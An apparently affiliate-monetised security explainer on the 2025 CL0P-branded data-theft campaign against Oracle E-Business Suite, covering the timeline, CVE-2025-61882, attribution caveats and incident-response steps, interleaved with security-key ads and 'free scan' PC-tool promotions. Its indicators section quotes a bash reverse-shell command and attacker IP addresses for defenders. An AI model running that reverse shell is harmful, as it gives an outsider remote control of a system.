Attackers exploited vulnerabilities in customer Oracle E-Business Suite (EBS) environments and stole data from at least dozens of organizations, Google Threat Intelligence Group and Mandiant reported in October 2025. They estimated the campaign could ultimately involve more than 100 organizations, but no definitive final victim count is public. The evidence describes attacks on EBS deployments—not a breach of Oracle’s central cloud infrastructure or every Oracle customer.
What was targeted—and what was not
Oracle E-Business Suite is enterprise software used for finance, operations, manufacturing, logistics, human resources, and customer and supplier records. Organizations may operate EBS on their own infrastructure or use a hosting provider. In this campaign, the target was an EBS application environment and the data available through it. Oracle was the software vendor; the public evidence does not establish that Oracle Cloud infrastructure itself was breached.
A vulnerable EBS installation is not proof it was exploited. Exploitation does not by itself prove that data was exfiltrated, and an extortion email alone does not establish that its sender accessed the recipient’s systems.
How many organizations were affected?
Google and Mandiant said they were aware of dozens of victims. Google analyst Austin Larsen estimated that the campaign could involve more than 100 organizations, drawing on the scale of previous CL0P operations. That was a projection, not a confirmed final tally. Public reporting does not establish the total number of victims, records, or volume of stolen data. Reuters reported the estimate on October 9, 2025.
Recommended Free Tools
#1 Best Overall
- POWERFUL SECURITY KEY: The Security Key C NFC is the essential physical passkey for protecting your digital life from phishing attacks. It ensures only you can access your accounts.
- WORKS WITH 1000+ ACCOUNTS: Compatible with Google, Microsoft, and Apple. A single Security Key C NFC secures 100 of your favorite accounts, including email, password managers, and more.
- FAST & CONVENIENT LOGIN: Plug in your Security Key C NFC via USB-C and tap it, or tap it against your phone (NFC) to authenticate. No batteries, no internet connection, and no extra fees required.
- TRUSTED PASSKEY TECHNOLOGY: Uses the latest passkey standards (FIDO2/WebAuthn & FIDO U2F) but does not support One-Time Passwords. For complex needs, check out the YubiKey 5 Series.
- BUILT TO LAST: Made from tough, waterproof, and crush-resistant materials. Manufactured in Sweden and programmed in the USA with the highest security standards.
Timeline of the 2025 EBS campaign
- July 10, 2025: Google and Mandiant identified suspicious activity that may have been early exploitation attempts. They could not confirm that every observed event was a successful exploit.
- August 9, 2025: Researchers assessed that exploitation of a zero-day may have begun by this date.
- September 29, 2025: Researchers began tracking a high-volume extortion-email campaign.
- October 2, 2025: Oracle said attackers may have exploited vulnerabilities patched in July and urged customers to apply current updates.
- October 4, 2025: Oracle issued an emergency security alert and patch for CVE-2025-61882.
- October 9, 2025: Google and Mandiant publicly described the campaign and said they knew of dozens of victims.
- October 11, 2025: Oracle issued an additional EBS security alert for CVE-2025-61884.
The dates distinguish possible early activity from researchers’ assessment of likely exploitation and from the later extortion wave. Some reported activity preceded the October emergency fix; systems that remained unpatched could also face later attempts. Google and Mandiant’s campaign analysis provides their timeline.
What the vulnerability information shows
The principal publicly identified flaw was CVE-2025-61882, affecting the BI Publisher Integration component of Oracle Concurrent Processing. Oracle rated it 9.8 on CVSS 3.1 and described it as remotely exploitable over HTTP without authentication, with potential for remote code execution. The affected supported EBS versions listed in Oracle’s alert are 12.2.3 through 12.2.14. Oracle also states that the October 2023 Critical Patch Update is a prerequisite for applying the fix; administrators should check that baseline as well as the emergency patch.
Rank #2
- POWERFUL SECURITY KEY: The YubiKey 5C NFC is the most versatile physical passkey, protecting your digital life from phishing attacks. It ensures only you can access your accounts
- WORKS WITH 1000+ ACCOUNTS: Compatible with popular accounts like Google, Microsoft, and Apple. A single YubiKey 5C NFC secures 100+ of your favorite accounts, including email, password managers, and more
- FAST & CONVENIENT LOGIN: Plug in your YubiKey 5C NFC via USB and tap it, or tap it against your phone (NFC), to authenticate. No batteries, no internet connection, and no extra fees required
- MOST SECURE PASSKEY: Supports FIDO2/WebAuthn, FIDO U2F, Yubico OTP, OATH-TOTP/HOTP, Smart card (PIV), and OpenPGP. That means it’s versatile, working almost anywhere you need it
- PRIMARY & SPARE KEYS: Just like having a spare house key, we recommend buying two YubiKeys - one for daily use and one as a spare. That way you’ll never get locked out of your accounts
That CVE is important, but it should not be treated as the explanation for every intrusion. Google and Mandiant observed multiple exploit chains and said the exact mapping between observed activity and particular vulnerabilities was not clear in every case. Oracle’s CVE-2025-61882 alert includes affected versions, patch guidance, and indicators.
How the extortion campaign worked
Attackers sent large numbers of messages to company executives claiming that the organization’s EBS environment had been breached and threatening to publish stolen data. Some messages included legitimate file listings from victim environments to lend credibility. A demand amount was not necessarily included in the first email. Contact addresses included [email protected] and [email protected], associated with the CL0P leak site.
Free tools Windows power users keep installed
One-click scans. No signup required.
Rank #3
- POWERFUL SECURITY KEY: The YubiKey 5 NFC is the most versatile physical passkey, protecting your digital life from phishing attacks. It ensures only you can access your accounts
- WORKS WITH 1000+ ACCOUNTS: Compatible with popular accounts like Google, Microsoft, and Apple. A single YubiKey 5 NFC secures 100+ of your favorite accounts, including email, password managers, and more
- FAST & CONVENIENT LOGIN: Plug in your YubiKey 5 NFC via USB and tap it, or tap it against your phone (NFC), to authenticate. No batteries, no internet connection, and no extra fees required
- MOST SECURE PASSKEY: Supports FIDO2/WebAuthn, FIDO U2F, Yubico OTP, OATH-TOTP/HOTP, Smart card (PIV), and OpenPGP. That means it’s versatile, working almost anywhere you need it
- PRIMARY & SPARE KEYS: Just like having a spare house key, we recommend buying two YubiKeys - one for daily use and one as a spare. That way you’ll never get locked out of your accounts
Researchers said messages were sent using numerous compromised third-party accounts, likely with credentials obtained from infostealer logs. As a result, an email could appear to come from a legitimate but unrelated organization. Recipients should preserve the message and its full headers, record the time received, and validate any claimed filenames or samples against internal records and forensic evidence. Do not reply casually or destroy evidence; an email claim is a lead to investigate, not proof of access.
Was CL0P responsible?
The actor claimed affiliation with the CL0P extortion brand, and the campaign’s infrastructure and extortion approach overlapped with known CL0P activity. Google and Mandiant did not formally attribute the intrusions to a specific tracked threat group. They cautioned that the brand and leak site may be used by more than one actor. The evidence therefore supports “CL0P-branded” or “an actor claiming affiliation with CL0P,” not a definitive attribution to a particular group.
Rank #4
- POWERFUL SECURITY KEY: The Security Key NFC is the essential physical passkey for protecting your digital life from phishing attacks. It ensures only you can access your accounts.
- WORKS WITH 1000+ ACCOUNTS: Compatible with Google, Microsoft, and Apple. A single Security Key NFC secures 100 of your favorite accounts, including email, password managers, and more.
- FAST & CONVENIENT LOGIN: Plug in your Security Key NFC via USB-A and tap it, or tap it against your phone (NFC) to authenticate. No batteries, no internet connection, and no extra fees required.
- TRUSTED PASSKEY TECHNOLOGY: Uses the latest passkey standards (FIDO2/WebAuthn & FIDO U2F) but does not support One-Time Passwords. For complex needs, check out the YubiKey 5 Series.
- BUILT TO LAST: Made from tough, waterproof, and crush-resistant materials. Manufactured in Sweden and programmed in the USA with the highest security standards.
What data may have been stolen?
Researchers described significant or mass amounts of data taken from some organizations, but public sources do not establish a standard set of stolen data or a total volume. Depending on an organization’s EBS configuration and connected systems, material potentially accessible through the environment could include employee or executive information, customer and supplier records, financial or operational documents, HR files, and other business records. That possibility does not mean each category was taken from every victim.
Keep four kinds of evidence distinct: what attackers claim to possess; file listings researchers verified as legitimate; material posted to a leak site; and access or exfiltration confirmed by the individual organization. A verified listing supports an investigation but does not, by itself, show that every listed file was removed.
Quick wins for a faster PC:
Clear out junk files and repair common Windows errorsFree Scan →Fix the driver behind crashes, sound loss and screen glitchesFind Drivers →Repair Windows errors before they cause bigger problemsFix Now →Best Value
- POWERFUL SECURITY KEY: The YubiKey 5 is a versatile physical passkey that protects your digital life from phishing attacks. It ensures only you can access your accounts.
- WORKS WITH 1000+ ACCOUNTS: Compatible with popular accounts like Google, Microsoft, and Apple. A single YubiKey 5 secures 100+ of your favorite accounts, including email, password managers, and more.
- FAST & CONVENIENT LOGIN: Plug in your YubiKey 5 via USB and tap it to authenticate. No batteries, no internet connection, and no extra fees required.
- MOST SECURE PASSKEY: Supports FIDO2/WebAuthn, FIDO U2F, Yubico OTP, OATH-TOTP/HOTP, Smart card (PIV), and OpenPGP. That means it’s versatile, working almost anywhere you need it.
- BUILT TO LAST: Made from tough, waterproof, and crush-resistant materials. Manufactured in Sweden and programmed in the USA with the highest security standards.
What Oracle did—and what a patch does not establish
Oracle first connected the activity to vulnerabilities addressed in July 2025, then issued the October 4 emergency alert for CVE-2025-61882 with indicators of compromise and an urgent patch recommendation. Its October 2025 Critical Patch Update incorporated fixes for that alert and the October 11 alert for CVE-2025-61884. Oracle’s update guidance is available in the October 2025 Critical Patch Update.
Applying fixes closes known vulnerabilities; it cannot establish whether an attacker got in earlier, whether data was taken, or whether credentials or persistence mechanisms remain. Organizations that patched after a suspected exposure window should pair patching with a compromise assessment.
What EBS organizations should do
- Inventory the environment: identify every EBS instance, its version, internet-facing endpoints, hosting provider, and the systems or data it can reach.
- Verify and apply updates: confirm the EBS version and prerequisite patch baseline, then apply Oracle’s October 2025 fixes and subsequent supported security updates. Coordinate with the hosting provider if it controls patching.
- Preserve evidence before destructive changes: retain relevant application, web-server, database, identity, and network logs; take appropriate database snapshots and system images; preserve extortion emails and headers. Document collection times and access.
- Hunt application and database artifacts: review EBS application and web-server logs for suspicious requests involving
/OA_HTML/configurator/UiServlet,/OA_HTML/SyncServlet, andTemplatePreviewPG. Examine theXDO_TEMPLATES_BandXDO_LOBStables for unusual templates, particularlyTEMPLATE_CODEvalues beginning withTMPorDEF. Google and Mandiant give these example queries:SELECT * FROM XDO_TEMPLATES_B ORDER BY CREATION_DATE DESC;andSELECT * FROM XDO_LOBS ORDER BY CREATION_DATE DESC;. Adapt them to the environment and have qualified database staff assess results. - Investigate execution and egress: look for suspicious Java child processes or shell execution under the EBS
applmgraccount, review outbound connections from EBS hosts, and restrict nonessential internet egress. Because implants may execute primarily in Java memory, include memory analysis where feasible. - Contain and recover carefully: if indicators or other evidence suggest compromise, engage incident responders, isolate affected systems as appropriate, and investigate before rebuilding or deleting artifacts. Rotate exposed credentials and tokens, especially service credentials accessible from EBS hosts.
- Address obligations: work with legal, privacy, security, and insurance teams to determine whether notification to regulators, affected people, law enforcement, or contractual partners is required. Duties depend on the data, affected people’s locations, sector rules, contracts, and what the investigation establishes.
For hosted EBS, ask the provider for the exact version and exposure status, patch dates, preservation of relevant logs and database evidence, availability of outbound-traffic and audit data, and a written account of what access is known. Confirm in advance which party is responsible for notification decisions.
Indicators are leads, not a clean-bill-of-health test
Oracle’s alert lists indicators including 200.107.207.26 and 185.181.60.11, as well as shell activity resembling sh -c /bin/bash -i >& /dev/tcp/<address>/<port> 0>&1 and hashes associated with exploit files. Consult Oracle’s alert and Google and Mandiant’s analysis for the complete, current defensive guidance rather than relying on a static list. An indicator’s absence does not show a system is clean: infrastructure changes, logs may be incomplete, and techniques can be fileless.
What’s actually slowing this PC down?
Pick the symptom - the matching free tool is one click away.
Separate incident: the 2026 PeopleSoft campaign
A June 2026 campaign involving Oracle PeopleSoft is a separate incident, not a continuation of the 2025 EBS victim count. Reporting on Google and Mandiant’s findings said more than 100 organizations may have been targeted, about 68% of them colleges or universities; some blocked or remediated activity, while others were compromised and had data published on a ShinyHunters leak site. That campaign was associated with ShinyHunters, not automatically with the actor claiming CL0P affiliation in the EBS case. Higher Ed Dive’s June 2026 report covers the later PeopleSoft activity.
Quick Recap
Product prices and availability are accurate as of the date/time indicated and are subject to change. Any price and availability information displayed on Amazon at the time of purchase will apply.




